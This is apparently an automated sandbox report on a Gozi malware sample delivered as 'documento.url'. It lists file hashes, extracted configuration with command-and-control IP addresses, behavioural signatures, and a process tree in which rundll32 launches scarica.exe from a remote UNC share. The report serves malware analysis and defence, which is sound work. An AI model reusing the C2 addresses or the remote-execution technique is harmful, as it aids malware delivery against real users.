Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
147s -
max time network
176s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
09/02/2023, 14:04
Static task
static1
Behavioral task
behavioral1
Sample
documento/documento.url
Resource
win7-20220812-en
General
-
Target
documento/documento.url
-
Size
193B
-
MD5
edca65cabb466cc4d38738f4661bfe47
-
SHA1
3d3ab1139b38b6e3fd16f26315b57fe9d904397c
-
SHA256
b6ece3b9c859b0baa1d09bc27a77df0e35a9bb0f866eefc726a3237a0eaa37fc
-
SHA512
ddffc79858639112d3f2337c6bbf0bbee4a8331153cb06be499cfbe543c36f371834ef376266ccf4af1f52cd54f58c08c56f0f4b7d06b19921f96617eda323e8
Malware Config
Extracted
gozi
Extracted
gozi
7708
checklist.skype.com
62.173.147.156
31.41.44.3
46.8.19.140
45.151.232.3
62.173.139.21
185.142.99.47
31.41.44.121
-
base_path
/drew/
-
build
250255
-
exe_type
loader
-
extension
.jlk
-
server_id
50
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 4824 wrote to memory of 5028 4824 rundll32.exe 80 PID 4824 wrote to memory of 5028 4824 rundll32.exe 80 PID 4824 wrote to memory of 5028 4824 rundll32.exe 80
Processes
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\documento\documento.url1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4824 -
\??\UNC\46.8.19.244\Agenzia\scarica.exe"\\46.8.19.244\Agenzia\scarica.exe"2⤵PID:5028
-